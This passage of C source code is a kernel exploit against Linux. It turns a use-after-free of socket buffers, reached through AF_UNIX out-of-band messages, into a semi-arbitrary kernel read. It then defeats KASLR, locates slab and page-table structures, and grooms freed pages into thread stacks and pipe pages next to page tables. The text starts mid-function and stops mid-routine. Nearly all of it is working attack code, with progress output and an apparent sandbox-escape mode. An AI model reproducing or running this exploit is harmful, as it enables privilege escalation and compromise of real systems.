  uint64_t whole_seconds_ns = ts.tv_sec * (uint64_t)1000000000;
  return whole_seconds_ns + ts.tv_nsec;
}
/*
 * Thread body: wait for an 8-byte token on mprotect_launch_fd, then change
 * mprotect_region (mprotect_region_size bytes) to PROT_READ and print how
 * long that mprotect() call took. Always returns NULL.
 */
static void *slow_mprotect_thread_fn(void *dummy) {
  uint64_t dummy_u64;

  SYSCHK(read(mprotect_launch_fd, &dummy_u64, sizeof(dummy_u64)));
  uint64_t t1 = time_u64();
  SYSCHK(mprotect(mprotect_region, mprotect_region_size, PROT_READ));
  uint64_t t2 = time_u64();

  // all three values are uint64_t, so all three use PRIu64
  uint64_t delay_ms = (t2-t1) / (1000*1000);
  printf("slow_mprotect_thread_fn: delay = %"PRIu64" ms [from %"PRIu64" to %"PRIu64"]\n", delay_ms, t1, t2);
  return NULL;
}

/*
 * Provoke a full TLB flush for this process by mapping, touching and
 * unmapping a small scratch area.
 */
static void tlb_flush() {
  // On x86-64 Linux, flush_tlb_mm_range() upgrades a ranged flush to a flush
  // of the whole address space when
  //
  //     ((end - start) >> stride_shift) > tlb_single_page_flush_ceiling
  //
  // with tlb_single_page_flush_ceiling being 33.
  // Unmapping a range with more than 33 populated zeropage entries should
  // therefore be batched into one such flush, with no flushes in between.
  // The VMA stays below 512 entries and keeps a PROT_NONE guard page on
  // either side so that THP cannot interfere.
  void *p = SYSCHK(mmap(NULL, 64*0x1000, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  SYSCHK(mprotect(p+0x1000, 62*0x1000, PROT_READ));

  // read-touch pages 1..62, i.e. everything except the two guard pages
  volatile char *cursor = (volatile char *)p + 0x1000;
  volatile char *stop = (volatile char *)p + 63*0x1000;
  while (cursor != stop) {
    (void)*cursor;
    cursor += 0x1000;
  }

  SYSCHK(munmap(p, 64*0x1000));
}

// Byte offset 0xa00.
// NOTE(review): not referenced in the visible part of the file; presumably the
// offset of the targeted object inside its page -- confirm at the use site.
#define TARGET_OBJECT_OFF 0xa00

#ifdef LD_PRELOAD_BUILD
int exploit_main(void) {
#else
int main(void) {
#endif
  char dummy;
#ifdef TRACE
  int pti_fd = SYSCHK(open("/proc/pagetypeinfo", O_RDONLY));
  int meminfo_fd = SYSCHK(open("/proc/meminfo", O_RDONLY));
#endif

  setbuf(stdout, NULL);
#ifndef LD_PRELOAD_BUILD
  // save changes in case we're about to crash the process/system
  sync();
#endif

#ifndef LD_PRELOAD_BUILD
#if 1
  enable_sandbox();
  printf("Chrome-equivalent sandbox engaged\n");
#else
  printf("SANDBOX WAS NOT ENABLED!!!!!!!!!!!!!!!!\n");
#endif
#endif

  printf("running in PID %d\n", getpid());
  unsigned long totalram_plus_swap = get_totalram_plus_swap();
  printf("RAM+swap: %lu MiB\n", totalram_plus_swap / (1024UL*1024UL));

#if 0
  // DETERMINISTIC FAULT TESTING
  SYSCHK(pipe(stallpipe));
  uffd_mem = SYSCHK(mmap(NULL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  int uffd = SYSCHK(syscall(__NR_userfaultfd, 0));
  struct uffdio_api api = { .api = 0xAA, .features = 0 };
  SYSCHK(ioctl(uffd, UFFDIO_API, &api));
  struct uffdio_register uffd_reg = {
    .range = {
      .start = (unsigned long)uffd_mem,
      .len = 0x1000
    },
    .mode = UFFDIO_REGISTER_MODE_MISSING
  };
  SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &uffd_reg));
#endif
#if 0
  write(stallpipe[1], uffd_mem, 1);
  exit(1);
#endif

  // early setup
  static const int NUM_PIPES = 256;
  int pipes[NUM_PIPES][2];
  for (int i=0; i<NUM_PIPES; i++)
    SYSCHK(pipe(pipes[i]));
  char two_pages[0x2000] = {0};
  for (unsigned long off = 0; off < 0x2000; off += 256) {
    struct sk_buff *skb = (void*)(two_pages + off);
    skb->len = 2000;
    skb->data_len = 0;
    if (off < 0x1000) {
      skb->data = (void*)"A2345678";
    } else {
      skb->data = (void*)"B2345678";
    }
  }

  // do this first, we can still migrate at this point
  drain_unmovable_pages(totalram_plus_swap / 100 * 10);

#ifdef TRACE
  {
    char dumptext[0x2000];
    int dumplen = SYSCHK(read(pti_fd, dumptext, sizeof(dumptext)));
    SYSCHK(write(1, dumptext, dumplen));
    dumplen = SYSCHK(read(meminfo_fd, dumptext, sizeof(dumptext)));
    SYSCHK(write(1, dumptext, dumplen));
  }
#endif

  // now we don't want to migrate/preempt anymore (TODO: check via rseq)
  drain_partial_skb_slab_pages();
  // Allocate 1.25 MiB of SKBs for flushing; that's 10240 SKBs.
  // Each socket can hold 256 packets, so this requires 40 sockets.
  // In addition, min_partial(5) slabs must be on the node partial list,
  // which requires at least another 5*32=160 SKBs plus padding.
  int flush_skb_fds[41];
  for (int i=0; i<41; i++) {
    int sockfds[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
    flush_skb_fds[i] = sockfds[0];
    for (int j = 0; j < 256; j++)
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
    close(sockfds[1]);
  }

  // make sure the active slab is completely available
  int active_fill_fds[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, active_fill_fds));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(send(active_fill_fds[1], "A", 1, MSG_DONTWAIT));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(recv(active_fill_fds[0], &dummy, 1, MSG_DONTWAIT));

  // set up dangling pointer
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_fds));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc A
  SYSCHK(recv(uaf_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc B
  SYSCHK(recv(uaf_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_fds[1], "A", 1, MSG_OOB)); // alloc C

  // replace active slab
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(send(active_fill_fds[1], "A", 1, MSG_DONTWAIT));
  for (int i=0; i<SKB__objs_per_slab; i++)
    SYSCHK(recv(active_fill_fds[0], &dummy, 1, MSG_DONTWAIT));

  // fill up min_partial slabs
  close(flush_skb_fds[40]);

  SYSCHK(recv(uaf_fds[0], &dummy, 1, 0)); // free A, C[DANGLING]; put uaf slab on pcpu freelist
  recv(uaf_fds[0], &dummy, 1, MSG_DONTWAIT); // free B; make uaf slab fully unused

  // flush slub and page alloc pcpu
  for (int i=0; i<40; i++)
    close(flush_skb_fds[i]);

  // try to realloc with 256 pipes each holding 2 pages (2 MiB)
  for (int i=0; i<NUM_PIPES; i++) {
    assert(SYSCHK(write(pipes[i][1], two_pages, 0x2000)) == 0x2000);
  }

  // find the pipe
  char rbyte;
  assert(SYSCHK(recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK)) == 1);
  assert(rbyte == 'A' || rbyte == 'B');
  printf("realloc seems to have worked, rbyte=%c, locating page...\n", rbyte);
  char scratch_page[0x1000];
  for (int i=0; i<NUM_PIPES; i++) {
    if (skb_off != -1) {
      close(pipes[i][0]);
      close(pipes[i][1]);
      continue;
    }

    if (rbyte == 'B') {
      // switch the order of the pages around
      assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);
      assert(SYSCHK(write(pipes[i][1], scratch_page, 0x1000)) == 0x1000);
    }
    // now the first page is the one we want.
    assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);
    assert(SYSCHK(read(pipes[i][0], scratch_page, 0x1000)) == 0x1000);

    char small_letters[] = "abcdefghijklmnopqrstuvwxyz";
    for (unsigned long off = 0; off < 0x1000; off += 256) {
      struct sk_buff *skb = (void*)(scratch_page + off);
      skb->len = 2000;
      skb->data_len = 1000;
      skb->data = (void*)(small_letters + off/256);
    }
    assert(SYSCHK(write(pipes[i][1], scratch_page, 0x1000)) == 0x1000);

    assert(SYSCHK(recv(uaf_fds[0], &rbyte, 1, MSG_OOB|MSG_PEEK)) == 1);
    if (rbyte != 'A' && rbyte != 'B') {
      printf("  found a hit ('%c')\n", rbyte);
      assert(rbyte >= 'a' && rbyte <= 'p');
      skb_off = 256 * (rbyte - 'a');
      uaf_pipe[0] = pipes[i][0];
      uaf_pipe[1] = pipes[i][1];
    } else {
      close(pipes[i][0]);
      close(pipes[i][1]);
    }
  }
  if (skb_off == -1)
    errx(1, "nope, realloc failed somehow after all, can't find it???");
  printf("got controlled SKB, semi-arbitrary read ready\n");

  // read the entry for #DE from the IDT
  struct gate_struct {
    uint16_t offset_low;
    uint16_t segment;
    uint16_t bits;
    uint16_t offset_middle;
    uint32_t offset_high;
    uint32_t reserved;
  } idt_entry;
  if (sarb_read(&idt_entry, /*CPU_ENTRY_AREA_RO_IDT_VADDR*/0xfffffe0000000000, sizeof(idt_entry)))
    errx(1, "unable to read IDT entry");
  unsigned long divide_error_handler_addr =
      (((uint64_t)idt_entry.offset_high  ) << 32) |
      (((uint64_t)idt_entry.offset_middle) << 16) |
      (((uint64_t)idt_entry.offset_low   ) <<  0);
  printf("#DE handler at 0x%lx\n", divide_error_handler_addr);
  kaslr_offset = divide_error_handler_addr - SYSMAP__asm_exc_divide_error;
  printf("KASLR offset: 0x%lx\n", kaslr_offset);
  assert((kaslr_offset & 0xfff) == 0);

  vmemmap_base = sarb_readl_checked(SYSMAP__vmemmap_base + kaslr_offset);
  printf("VMEMMAP_START = 0x%lx\n", vmemmap_base);
  page_offset_base = sarb_readl_checked(SYSMAP__page_offset_base + kaslr_offset);
  printf("__PAGE_OFFSET = 0x%lx\n", page_offset_base);

  per_cpu_offset = calloc(CONFIG_NR_CPUS, sizeof(unsigned long));
  sarb_read_checked(per_cpu_offset, SYSMAP____per_cpu_offset + kaslr_offset, CONFIG_NR_CPUS*sizeof(unsigned long));

  // find mm_struct of current process
  unsigned long mm = percpu_readl(SYSMAP__cpu_tlbstate);
  printf("mm_struct at 0x%lx\n", mm);

  // find page tables of current process
  {
    unsigned long head = SYSMAP__pgd_list + kaslr_offset;
    unsigned long cur = head;
    while (1) {
      cur = sarb_readl_checked(cur);
      if (cur == head)
        errx(1, "unable to find pgd for our mm");
      struct ptdesc *p = (void*)(cur - offsetof(struct ptdesc, pt_list));
      unsigned long p_mm = sarb_readl_checked((unsigned long)&p->pt_mm);
      if (p_mm == mm) {
        mm_pgd = page_to_virt((unsigned long)p);
        break;
      }
    }
  }
  printf("PGD is at 0x%lx\n", mm_pgd);

  __pgtable_l5_enabled = sarb_read4_checked(SYSMAP____pgtable_l5_enabled + kaslr_offset);
  printf("paging levels: %d\n", __pgtable_l5_enabled?5:4);


  // find slab percpu data
  unsigned long skbuff_cache = sarb_readl_checked(SYSMAP__net_hotdata + OFFSET__net_hotdata__skbuff_cache + kaslr_offset);
  // see __kmalloc_index()
  unsigned long kmalloc_192_acc_cache = sarb_readl_checked(SYSMAP__kmalloc_caches + (14*3/*KMALLOC_CGROUP*/ + 2)*sizeof(void*) + kaslr_offset);

  // dump percpu allocator state
  unsigned long pcpu_chunk_lists = sarb_readl_checked(SYSMAP__pcpu_chunk_lists + kaslr_offset);
  unsigned long pcpu_free_slot = sarb_read4_checked(SYSMAP__pcpu_free_slot + kaslr_offset);
  printf("percpu regions (pcpu_free_slot = %lu)\n", pcpu_free_slot);

  // locate percpu state of slabs
  unsigned long skbuff_pcpu = 0;
  unsigned long kmalloc_192_acc_pcpu = 0;
  while (!skbuff_pcpu || !kmalloc_192_acc_pcpu) {
    for (unsigned int slot = 0; slot < pcpu_free_slot; slot++) {
      //printf("  pcpu_chunk_lists[%u]\n", slot);
      unsigned long list_start_ptr = pcpu_chunk_lists + 0x10 * slot;
      unsigned long elem = list_start_ptr;
      while (1) {
        elem = sarb_readl_checked(elem);
        if (elem == list_start_ptr)
          break;
        printf("    0x%lx: ", elem);
        struct pcpu_chunk chunk;
        sarb_read_checked(&chunk, elem, sizeof(chunk));
        // from pcpu_addr_in_chunk()
        unsigned long start_addr = chunk.base_addr + chunk.start_offset;
        unsigned long end_addr = chunk.base_addr + chunk.nr_pages * 0x1000 - chunk.end_offset;
        printf("0x%lx - 0x%lx\n", start_addr, end_addr);

        for (unsigned long addr = start_addr; addr < end_addr - 32; addr += 0x10) {
  again:;
          unsigned long pcpu_addr = addr - per_cpu_offset[0]; // gs-relative address
          unsigned long lcpu_addr = pcpu_addr + per_cpu_offset[sched_getcpu()];
          unsigned long tid1;
          if (sarb_read(&tid1, lcpu_addr + 8, sizeof(tid1)))
            continue;
          // hacky fastpath, based on assumption that getting this high would take
          // hundreds of days (assuming one allocation every 10ns or so),
          // so wraparound probably takes longer than system uptime
          if (tid1 > 0x8000000000000000)
            continue;
          unsigned long freelist = sarb_readl_checked(lcpu_addr);
          // we won't be able to detect fully-drained slabs here, but that should
          // be fine
          if (freelist < 0xff00000000000000)
            continue;
          unsigned long slab;
          if (sarb_read(&slab, lcpu_addr + 0x10, sizeof(slab)))
            continue;
          if (slab >= /*cpu_entry_area start*/0xfffffe0000000000)
            continue;
          unsigned long cpu = tid1 % CONFIG_NR_CPUS;
          if (sarb_readl_checked(lcpu_addr + 8) != tid1)
            goto again;

          if (slab < vmemmap_base)
            continue;

          unsigned long recalc_page = (freelist - page_offset_base) / 0x1000 * 64 + vmemmap_base;
          if (recalc_page - slab >= 8*64) {
            //printf("      0x%lx: 0x%lx vs 0x%lx, recalc 0x%lx\n", lcpu_addr, freelist, slab, recalc_page);
            continue;
          }

          unsigned long cache = sarb_readl_checked(slab + 8);
          if (sarb_readl_checked(lcpu_addr + 8) != tid1)
            goto again;

          //printf("      0x%lx: cache=0x%lx\n", lcpu_addr, cache);
          if (cache == skbuff_cache) {
            printf("        FOUND skbuff_cache\n");
            skbuff_pcpu = pcpu_addr;
          }
          if (cache == kmalloc_192_acc_cache) {
            printf("        FOUND kmalloc_192_acc_cache\n");
            kmalloc_192_acc_pcpu = pcpu_addr;
          }
        }
      }
    }
    if (!skbuff_pcpu) {
      // allocate one skb, and free it again
      int sockfds[2];
      SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
      close(sockfds[0]);
      close(sockfds[1]);
    }
    if (!kmalloc_192_acc_cache) {
      // allocate one pipe_inode_info, and free it again
      int pipefds_tmp[2];
      SYSCHK(pipe(pipefds_tmp));
      close(pipefds_tmp[0]);
      close(pipefds_tmp[1]);
    }
  }

  char dummy_page[0x1000] = {};
  char dummy_2pages[0x2000] = {};
  int pagestashpipes[3][2];
  for (int i=0; i<3; i++) {
    SYSCHK(pipe(pagestashpipes[i]));
    SYSCHK(write(pagestashpipes[i][1], dummy_2pages, sizeof(dummy_2pages)));
    close(pagestashpipes[i][1]);
  }
  int cycle_pipe[2];
  SYSCHK(pipe(cycle_pipe));
  SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));

  for (int i=0; i<41; i++) {
    int sockfds[2];
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfds));
    flush_skb_fds[i] = sockfds[0];
    for (int j = 0; j < 256; j++)
      SYSCHK(send(sockfds[1], "A", 1, MSG_DONTWAIT));
    close(sockfds[1]);
  }

  // Try to allocate an entire slab page, with a poke FD referencing the object
  // at a specific offset.
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, drainsocks_normal.sockfds));
  int uaf_slab_socks[2];
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_slab_socks));
  // prepare uaf_write_trigger_fds
  SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, uaf_write_trigger_fds));
  SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB)); // alloc A
  SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, MSG_OOB));
  SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB)); // alloc B
  SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, MSG_OOB));
  unsigned long uaf_slab_va = 0;
  while (1) {
continue_slaballoc:;
    int cpu1 = sched_getcpu();
    unsigned long skbuff_lcpu = skbuff_pcpu + per_cpu_offset[cpu1];
    unsigned long tid1 = sarb_readl_checked(skbuff_lcpu + 8);
    unsigned long slab = sarb_readl_checked(skbuff_lcpu + 0x10);
    unsigned long freelist = sarb_readl_checked(skbuff_lcpu + 0);
    if (tid1 != sarb_readl_checked(skbuff_lcpu + 8) || cpu1 != sched_getcpu())
      continue;

    // If we currently have a non-empty active slab, drain it away.
    if (freelist != 0) {
      drain_one(&drainsocks_normal);
      continue;
    }

    // The percpu freelist is empty, the next allocation will switch to a new
    // slab or pull from the slab freelist.
    // Allocate one SKB and immediately put it back.
    SYSCHK(send(uaf_slab_socks[1], "A", 1, MSG_DONTWAIT));
    SYSCHK(recv(uaf_slab_socks[0], &dummy, 1, MSG_DONTWAIT));
    if (cpu1 != sched_getcpu()) continue;
    tid1 = sarb_readl_checked(skbuff_lcpu + 8);
    slab = sarb_readl_checked(skbuff_lcpu + 0x10);
    freelist = sarb_readl_checked(skbuff_lcpu + 0);
    if (tid1 != sarb_readl_checked(skbuff_lcpu + 8) || cpu1 != sched_getcpu())
      continue;

    // Allocate objects into it and see if we get a full slab worth.
    int objs_in_slab = 0, target_objs_in_slab = 0;
    while (objs_in_slab<SKB__objs_per_slab) {
      unsigned long freelist_cur = sarb_readl_checked(skbuff_lcpu + 0);
      if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + objs_in_slab*CONFIG_NR_CPUS)
        goto move_to_drain;
      bool is_target_obj = ((freelist_cur & (0x1fff)) == TARGET_OBJECT_OFF);

      SYSCHK(send(uaf_slab_socks[is_target_obj?0:1], "A", 1, MSG_DONTWAIT));
      objs_in_slab++;
      if (is_target_obj)
        target_objs_in_slab++;
      if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + objs_in_slab*CONFIG_NR_CPUS ||
              cpu1 != sched_getcpu() || (objs_in_slab != SKB__objs_per_slab && freelist_cur == 0)) {
move_to_drain:
        for (int i=0; i<objs_in_slab-target_objs_in_slab; i++) {
          SYSCHK(recv(uaf_slab_socks[0], &dummy, 1, MSG_DONTWAIT));
          if (drain_one(&drainsocks_normal))
            errx(1, "ran out of drain");
        }
        for (int i=0; i<target_objs_in_slab; i++) {
          SYSCHK(recv(uaf_slab_socks[1], &dummy, 1, MSG_DONTWAIT));
          if (drain_one(&drainsocks_normal))
            errx(1, "ran out of drain");
        }
        goto continue_slaballoc;
      }
    }
    if (target_objs_in_slab != 1) {
      printf("weird stuff A (target_objs_in_slab=%d)\n", target_objs_in_slab);
      goto move_to_drain;
    }

    // make dangling pointer to target object and put it on the list with the rest
    SYSCHK(recv(uaf_slab_socks[1], &dummy, 1, MSG_DONTWAIT));
    SYSCHK(send(uaf_write_trigger_fds[1], "A", 1, MSG_OOB));
    SYSCHK(recv(uaf_write_trigger_fds[0], &dummy, 1, 0));
    SYSCHK(send(uaf_slab_socks[1], "A", 1, MSG_DONTWAIT));
    if (cpu1 != sched_getcpu())
      errx(1, "migrated at annoying time A, please try again");
    if (sarb_readl_checked(skbuff_lcpu + 8) != tid1 + (SKB__objs_per_slab+4)*CONFIG_NR_CPUS)
      errx(1, "raced with other slab operation at annoying time B, please try again");
    uaf_slab_va = slab;
    break;
  }

  // do one more allocation to deactivate active slab
  if (drain_one(&drainsocks_normal))
    errx(1, "ran out of drain");

  // fill up min_partial slabs
  close(flush_skb_fds[40]);
  // TODO: percpu stack alloc stuff below risks preemption

  unsigned long uaf_slab_linear = page_to_virt(uaf_slab_va);
  printf("slab page in linear mapping: 0x%lx\n", uaf_slab_linear);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("before freeing slab page: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
    if (page_refcount != 1)
      errx(1, "unexpected page refcount");
  }

  // prepare for thread setup
  bogostack_ready_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  bogostack_continue_fd = SYSCHK(eventfd(0, EFD_SEMAPHORE));
  static const unsigned long userstack_size = 1024*1024;
  unsigned char *bogostack_userstack = SYSCHK(mmap(NULL, userstack_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  memset(bogostack_userstack, 'A', userstack_size);
  SYSCHK(mprotect(bogostack_userstack, 0x1000, PROT_NONE));
  bogostack_userstack += userstack_size;

  // drain percpu stacks
  {
    int cur_cpu = sched_getcpu();
    int threads_created = 0;
    while (threads_created < 2) {
      pthread_t thread;
      if (pthread_create(&thread, NULL, dummy_thread_fn, NULL))
        errx(1, "pthread_create");
      threads_created++;
      if (cur_cpu != sched_getcpu()) {
        threads_created = 0;
        cur_cpu = sched_getcpu();
      }
    }
  }

  unsigned long drain_va_size = totalram_plus_swap / 0x1000/*->pages*/ * 0x200000/*->PTs*/;

  // create VMA with 2M alignment
  char *drain_area_orig = SYSCHK(mmap(NULL, drain_va_size+0x1ff000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS|MAP_NORESERVE, -1, 0));
  char *drain_area_orig_end = drain_area_orig + drain_va_size+0x1ff000;
  char *drain_area = (char*)(((unsigned long)drain_area_orig + 0x1ff000) & ~0x1ff000UL);
  if (drain_area != drain_area_orig)
    SYSCHK(munmap(drain_area_orig, drain_area - drain_area_orig));
  if (drain_area + drain_va_size != drain_area_orig_end)
    SYSCHK(munmap(drain_area + drain_va_size, drain_area_orig_end - (drain_area + drain_va_size)));
  unsigned long drain_area_off = 0;
  for (unsigned long off = 0; off < drain_va_size; off += 0x200000UL*512UL) {
    // prefault upper page tables
    *(volatile char *)(drain_area+off);
  }

  // free the slab page
  close(uaf_slab_socks[0]);
  close(uaf_slab_socks[1]);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("after freeing slab page: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
  }

  // flush it out of the slab node partial list and page allocator partial list
  for (int i=0; i<40; i++)
    close(flush_skb_fds[i]);

  {
    unsigned int page_refcount = sarb_read4_checked(uaf_slab_va + OFFSET__page__refcount);
    union slab_counters counters = { .counters_short = sarb_read4_checked(uaf_slab_va + offsetof(struct slab, counters)) };
    printf("after flushing: slab page refcount is now %u, inuse=%u, objects=%u, frozen=%u\n",
            page_refcount, counters.inuse, counters.objects, counters.frozen);
    assert(page_refcount == 0);
  }

  while (1) {
    unsigned char page_refcount = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
    if (page_refcount != 0)
      errx(1, "something else got the page, please retry");
    // allocate a page
    SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));
    // did we get the page we were looking for?
    page_refcount = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);

    // free it again
    SYSCHK(read(cycle_pipe[0], dummy_2pages, 0x2000));

    // put the pipe's spare page back into a pipe_buffer
    SYSCHK(write(cycle_pipe[1], dummy_page, 0x1000));

    if (page_refcount != 0)
      break;

    // nope, not it
    *(volatile char *)(drain_area + drain_area_off);
    drain_area_off += 0x200000;
  }
  // free three pages
  for (int i=0; i<3; i++)
    SYSCHK(read(pagestashpipes[i][0], dummy_2pages, 0x2000));
  // create thread
  unsigned long cached_stacks[2] = {percpu_readl(SYSMAP__cached_stacks),percpu_readl(SYSMAP__cached_stacks)};
  unsigned char page_refcount_before_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
  {
    static pid_t bogostack_parent_tid, bogostack_child_tid;
    long clone_result;
    asm volatile (
      "mov %[child_tidptr], %%r10\n\t"
      "mov %[tls], %%r8\n\t" //TLS
      "mov $56, %%eax\n\t"
      "syscall\n\t"
      "test %%eax, %%eax\n\t"
      "jnz 1f\n\t"
      "push $0x1234\n\t"
      "jmp bogostack_thread_fn\n\t"
      "1:\n\t"
      : "=a"(clone_result)
      : "D"(CLONE_VM|CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_THREAD|CLONE_SYSVSEM|CLONE_SETTLS|CLONE_PARENT_SETTID|CLONE_CHILD_CLEARTID),
        "S"(bogostack_userstack),
        "d"(&bogostack_parent_tid),
        [child_tidptr] "r"(&bogostack_child_tid),
        [tls] "r"(*(unsigned long __seg_fs *)0x10UL) // hack, 0x10 is offsetof(tcbhead_t, self)
      : "cc", "r11", "cx",
        "r10", "r8" // args
    );
    printf("clone() returned %ld\n", clone_result);
    if (clone_result <= 0)
      errx(1, "clone fail");
  }
  SYSCHK(read(bogostack_ready_fd, dummy_page, 8));
  unsigned char page_refcount_after_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__refcount);
  unsigned int page_type_after_clone = sarb_read1_checked(uaf_slab_va + OFFSET__page__page_type + 3);
  printf("hopefully realloc'd as thread stack vmalloc page now? before=%hhu, after=%hhu, after_type=0x%x\n",
      page_refcount_before_clone, page_refcount_after_clone, page_type_after_clone);
  printf("cached stacks were: 0x%lx, 0x%lx\n", cached_stacks[0], cached_stacks[1]);
  printf("thread stack at 0x%lx\n", bogostack_top_of_stack);
  for (unsigned long i=0; i<4; i++) {
    unsigned long stackpage_va = bogostack_top_of_stack - (4-i) * 0x1000;
    unsigned long stackpage_lm = uvirt_to_kvirt(stackpage_va, 0);
    bool hit = (uaf_slab_linear == stackpage_lm);
    printf("thread stack page %lu: 0x%lx -> 0x%lx %s\n", i, stackpage_va, stackpage_lm, hit?"✔":"✘");
    if (i == 3 && !hit)
      errx(1, "realloc as thread stack page failed");
  }
  printf("realloc as thread stack page succeeded! 🎉\n");

  // allocate a pipe with pipe_inode_info in a known location
  unsigned long addr_leak_pipe_kaddr;
  while (1) {
    int cpu1 = sched_getcpu();
    unsigned long cache_lcpu = kmalloc_192_acc_pcpu + per_cpu_offset[cpu1];
    unsigned long tid1 = sarb_readl_checked(cache_lcpu + 8);
    unsigned long freelist = sarb_readl_checked(cache_lcpu + 0);
    if (tid1 != sarb_readl_checked(cache_lcpu + 8) || cpu1 != sched_getcpu())
      continue;
    if (freelist == 0) {
      SYSCHK(pipe(addr_leak_pipe));
      close(addr_leak_pipe[0]);
      close(addr_leak_pipe[1]);
      continue;
    }

    SYSCHK(pipe(addr_leak_pipe));
    if (tid1+CONFIG_NR_CPUS != sarb_readl_checked(cache_lcpu + 8) || cpu1 != sched_getcpu()) {
      close(addr_leak_pipe[0]);
      close(addr_leak_pipe[1]);
      continue;
    }
    addr_leak_pipe_kaddr = freelist;
    break;
  }
  printf("created pipe_inode_info at 0x%lx\n", addr_leak_pipe_kaddr);
  unsigned long pipe_bufs_kaddr = sarb_readl_checked(addr_leak_pipe_kaddr + OFFSET__pipe_inode_info__bufs);
  printf("pipe buffers at 0x%lx\n", pipe_bufs_kaddr);
  unsigned int pipe_size = sarb_read4_checked(addr_leak_pipe_kaddr + OFFSET__pipe_inode_info__ring_size);
  printf("pipe size (in pages): %u\n", pipe_size);

  // try to get a pipe page adjacent to a page table
#define NUM_PT_COLLECT 10000
  static unsigned long page_table_addrs[NUM_PT_COLLECT][2];
  int page_table_idx_write = 0;
  int page_table_idx_saturated = 0;
  unsigned int cur_pipe_idx = 0;
  unsigned long target_page_table_va;
  unsigned long overflowing_page_va;
  printf("searching for adjacent pages: ");
  for (unsigned long iter=0; true; iter++) {
    if (iter%2 == 0) {
      // allocate a page into our pipe
      SYSCHK(write(addr_leak_pipe[1], dummy_2pages, 0x2000));
    }

    // allocate a page table
    void *ptarea = SYSCHK(mmap(NULL, 0x400000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
    ptarea = (void*)(((unsigned long)ptarea + 0x1ff000) & ~0x1ff000UL);
    SYSCHK(mprotect(ptarea, 0x1000, PROT_READ|PROT_WRITE));
    *(volatile char *)ptarea;
    SYSCHK(mprotect(ptarea, 0x1000, PROT_READ));
    page_table_addrs[page_table_idx_write][0] = (unsigned long)ptarea;
    page_table_addrs[page_table_idx_write][1] = uvirt_to_kvirt((unsigned long)ptarea, 1);
    printf("got table 0x%lx\n", page_table_addrs[page_table_idx_write][1]);
    page_table_idx_write = (page_table_idx_write + 1) % NUM_PT_COLLECT;
    if (page_table_idx_saturated < NUM_PT_COLLECT)
      page_table_idx_saturated++;

    if (iter%2 == 0) {
      // see if the pipe page is in front of a page table we know, otherwise discard it
      unsigned long pipe_buf_idx = (cur_pipe_idx+1) % pipe_size;
      unsigned long ppage = sarb_readl_checked(pipe_bufs_kaddr + sizeof(struct pipe_buffer)*pipe_buf_idx + offsetof(struct pipe_buffer, page));
      unsigned long ppage_virt = page_to_virt(ppage);
      printf("got pipe page 0x%lx (page*=0x%lx)\n", ppage_virt, ppage);

      for (int pti = 0; pti < page_table_idx_saturated; pti++) {
        if (page_table_addrs[pti][1] == ppage_virt+0x1000) {
          overflowing_page_va = ppage_virt;
          target_page_table_va = page_table_addrs[pti][0];
          printf(" HIT! page table region: 0x%lx\n", target_page_table_va);
          goto pt_collect_end;
        }
      }

      SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x2000));
      cur_pipe_idx += 2;
      printf(".");
    }
  }
pt_collect_end:;

  // current pipe state: [<old tmp_page>, <overflow page>]
  // first turn it into: [<overflow page>, <old tmp_page>]
  SYSCHK(read(addr_leak_pipe[0], dummy_2pages, 0x1000));
